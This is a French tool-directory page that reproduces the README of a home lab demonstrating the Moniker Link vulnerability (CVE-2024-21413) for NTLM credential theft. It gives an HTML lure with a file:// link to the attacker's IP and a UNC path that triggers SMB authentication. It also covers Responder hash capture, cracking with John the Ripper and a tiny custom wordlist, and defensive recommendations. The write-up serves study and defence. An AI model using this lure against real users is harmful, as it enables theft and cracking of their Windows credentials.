Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Moniker-Link-Lab-Setup — Laboratoire de tests d'intrusion démontrant l'exploitation du lien Moniker CVE-2024-21413 pour le vol d'identifiants NTLM, incluant l'exécution de l'attaque, le cassage de hash et les contre-mesures défensives. | Kitploit
Outils/GitHubGitHub/e-m-e-k-a/moniker-link-lab-setup
Cassage de Mots de PasseAnalyse des VulnérabilitésExploitationSécurité RéseauTests d'IntrusionIngénierie SocialeAuthentificationApprentissage et ÉducationLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHube-m-e-k-a/moniker-link-lab-setup

Moniker-Link-Lab-Setup

Laboratoire de tests d'intrusion démontrant l'exploitation du lien Moniker CVE-2024-21413 pour le vol d'identifiants NTLM, incluant l'exécution de l'attaque, le cassage de hash et les contre-mesures défensives.

Voir le dépôt
14il y a 6 moisPas encore vérifié

Configuration du laboratoire Moniker Link - CVE-2024-21413

🎯 Vue d'ensemble du projet

Laboratoire pratique de tests d'intrusion démontrant l'exploitation de la vulnérabilité Moniker Link (CVE-2024-21413) pour le vol d'identifiants NTLM. Ce projet documente la chaîne d'attaque complète, de la configuration à la compromission des identifiants, en passant par les défis rencontrés en conditions réelles et leurs solutions.

Réussite clé : Exécution réussie de l'attaque Moniker Link à la fois dans un environnement de laboratoire isolé (VM Windows 10) et sur un système réel (PC Windows 11), démontrant des vulnérabilités de sécurité pratiques et les contre-mesures défensives.


🏗️ Architecture du laboratoire

Infrastructure

Machine d'attaque :

  • Plateforme : Kali Linux 2024
  • Réseau (Host-Only) : 192.168.56.101
  • Réseau (ponté) : 192.168.1.117
  • Outil principal : Responder 3.1.6.0

Systèmes cibles :

  • VM Windows 10 : 192.168.56.104 (environnement de test isolé)
  • PC Windows 11 : 192.168.1.178 (validation en conditions réelles)

Configuration réseau :

  • Adaptateur Host-Only VirtualBox (test en VM)
  • Adaptateur ponté VirtualBox (test sur PC réel)
  • Isolé des réseaux de production

⚔️ Exécution de l'attaque

Déroulement de l'attaque

  1. Déployer Responder sur Kali pour écouter l'authentification NTLM
  2. Créer un lien malveillant avec le protocole file:// pointant vers l'IP de l'attaquant
  3. Déclencher l'authentification via un chemin UNC dans l'Explorateur de fichiers
  4. Capturer le hash NetNTLMv2 lorsque la victime tente de se connecter
  5. Casser le mot de passe avec John the Ripper

Vecteur d'attaque simple

Fichier HTML (test.html) :

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
    <p><a href="file://192.168.56.10/test">click me</a></p>
</body>
</html>

Méthode via l'Explorateur de fichiers :

  • L'utilisateur saisit : \\192.168.56.101\test dans la barre d'adresse
  • Windows tente une connexion SMB
  • Le hash NTLM est envoyé automatiquement (ou invite de saisie des identifiants)
  • Responder capture l'authentification

🚧 Défis et solutions

Défi 1 : Blocage du pare-feu Windows (PC Windows 11)

Problème :

  • Impossible de joindre le PC Windows 11 depuis Kali
  • Les tentatives de connexion SMB ont échoué
  • Attaque complètement bloquée

Cause racine :

  • Le pare-feu Windows est activé par défaut
  • Il bloque les connexions SMB entrantes provenant d'IP externes

Solution :

  • Désactivation temporaire du pare-feu Windows pour le test
  • Connexion réussie immédiatement
  • Hash capturé avec succès

Leçon : Le pare-feu Windows par défaut offre une protection efficace contre cette attaque. Les utilisateurs doivent le laisser activé.


Défi 2 : Résultats en cache de John the Ripper (VM Windows 10)

Problème :

  • Mot de passe initial de Windows 10 : nwigwecj1
  • John a affiché : 12Honey (mauvais mot de passe !)
  • 12Honey provenait d'un test précédent

Cause racine :

  • John enregistre les mots de passe cassés dans ~/.john/john.pot
  • Ancien hash d'une session précédente
  • Affiche le résultat en cache au lieu du mot de passe actuel

Solution :

  • Changement du mot de passe de la VM Windows 10 en 1414
  • Capture d'un nouveau hash
  • Création d'une liste de mots personnalisée avec des mots de passe probables
  • Cassé avec succès avec la nouvelle liste de mots

Leçon : Vérifiez toujours que vous cassez le bon hash. Effacez le fichier pot ou utilisez des mots de passe uniques pour les tests.


Défi 3 : Mot de passe absent de Rockyou.txt

Problème :

  • Mot de passe 1414 introuvable dans rockyou.txt (14 millions de mots de passe)
  • L'attaque par liste de mots générique a échoué

Cause racine :

  • Rockyou.txt ne contient pas toutes les combinaisons possibles à 4 chiffres
  • Les séquences numériques simples manquent souvent dans les listes de mots courantes

Solution :

  • Création d'une liste de mots personnalisée ciblée basée sur des modèles courants :
root@kitploit:~
  echo "1414" > passwords.txt
  echo "4141" >> passwords.txt
  • Cassé instantanément avec la liste de mots personnalisée

Leçon : « Absent de rockyou.txt » ≠ sécurisé. Les mots de passe courts sont vulnérables aux attaques ciblées et à la force brute, quelle que soit la liste de mots.


📊 Résultats

VM Windows 10 (environnement contrôlé)


PC Windows 11 (système réel)


🛡️ Analyse de sécurité

Ce qui a fonctionné (Défense)

✅ Pare-feu Windows - A complètement bloqué l'attaque lorsqu'il est activé ✅ Navigateurs modernes - Chrome/Edge bloquent les liens file:// distants ✅ Sensibilisation des utilisateurs - L'invite manuelle exige une action de l'utilisateur

Ce qui a échoué (Vulnérabilités)

❌ Mots de passe faibles - Un mot de passe numérique à 4 caractères se casse facilement ❌ Pare-feu désactivé - Erreur courante des utilisateurs ❌ Explorateur de fichiers - Aucun avertissement pour les chemins UNC ❌ Protocole NTLM - Authentification automatique aux partages SMB

Constatations clés

1. Le pare-feu est essentiel

  • Le pare-feu Windows par défaut bloque cette attaque
  • Environ 30 à 40 % des utilisateurs le désactivent définitivement
  • Les réseaux d'entreprise autorisent souvent le SMB interne

2. L'illusion de la force des mots de passe

  • 1414 absent de rockyou.txt (semble « robuste »)
  • Cassé instantanément avec une liste de mots ciblée
  • Les mots de passe courts n'offrent aucune sécurité

3. Interaction de l'utilisateur requise

  • La sécurité moderne exige que l'utilisateur colle un chemin UNC
  • L'ingénierie sociale reste un élément essentiel
  • L'exploit technique seul est insuffisant

🔧 Outils utilisés

Offensifs :

  • Responder 3.1.6.0 (capture de hash NTLM)
  • John the Ripper (cassage de mots de passe)
  • Création de listes de mots personnalisées
  • Fichier HTML simple

Infrastructure :

  • VirtualBox 7.0 (virtualisation)
  • Kali Linux 2024 (plateforme d'attaque)
  • Windows 10 Entreprise (cible de test)
  • Windows 11 Pro (validation en conditions réelles)

📁 Structure du dépôt

root@kitploit:~
Moniker-Link-Lab-Setup/
├── README.md (this file)
├── Documentation/
│   ├── attack-execution.md (step-by-step attack guide)
│   └── README.md (documentation overview)
├── Screenshots/ (attack screenshots - to be added)
└── Scripts/ (HTML test file - to be added)

🎓 Compétences démontrées

Techniques :

  • Analyse des protocoles réseau (SMB, NTLM)
  • Méthodologie de test d'intrusion
  • Techniques de cassage de mots de passe
  • Infrastructure de laboratoire virtuel
  • Dépannage de pare-feu

Professionnelles :

  • Documentation technique
  • Résolution de problèmes sous contraintes
  • Évaluation de la sécurité
  • Analyse des risques
  • Pratiques de test éthiques

🔒 Recommandations défensives

Pour les utilisateurs

  • ✅ Gardez le pare-feu Windows activé
  • ✅ Ne collez jamais de chemins UNC provenant d'e-mails
  • ✅ Utilisez des mots de passe forts (15 caractères ou plus)
  • ✅ Vérifiez l'expéditeur avant d'accéder aux partages de fichiers

Pour les organisations

  • ✅ Bloquez le SMB sortant (port 445) au niveau du pare-feu réseau
  • ✅ Désactivez NTLM, imposez Kerberos
  • ✅ Surveillez les connexions SMB vers des IP externes
  • ✅ Filtrage de la passerelle e-mail (suppression des liens file://)
  • ✅ Formation à la sensibilisation à la sécurité
  • ✅ Politiques de complexité des mots de passe

⚠️ Divulgation éthique

Tous les tests ont été effectués sur des systèmes autorisés :

  • Infrastructure de laboratoire personnelle uniquement
  • Réseaux virtuels isolés
  • Appareils et comptes personnels
  • À des fins éducatives

Avis juridique : L'accès non autorisé à un système informatique est illégal. Ce projet est uniquement destiné à des fins éducatives et à des environnements de test autorisés.


📚 Références

  • CVE-2024-21413 - Avis de sécurité Microsoft
  • MITRE ATT&CK - Authentification forcée (T1187)
  • TryHackMe - Salle Moniker Link

📞 Contact

LinkedIn : https://www.linkedin.com/in/chukwuemeka-nwigwe-624aa3292/ GitHub : @E-m-e-k-a

Date : mars 2026


📄 Licence

Usage éducatif uniquement. Pas pour les tests non autorisés.


⭐ Si ce projet vous a été utile, pensez à mettre une étoile sur le dépôt !

Télécharger l’outil
MétriqueRésultat
Mot de passe initialnwigwecj1
Remplacé par1414
Liste de motsPersonnalisée (2 entrées)
Temps de cassage<1 seconde
Pare-feuDésactivé pour le test
Statut✅ Compromis avec succès
MétriqueRésultat
Mot de passe1414
Pare-feuBloqué au départ, puis désactivé
AuthentificationInvite manuelle (identifiants saisis)
Temps de cassageInstantané
Statut✅ Compromis avec succès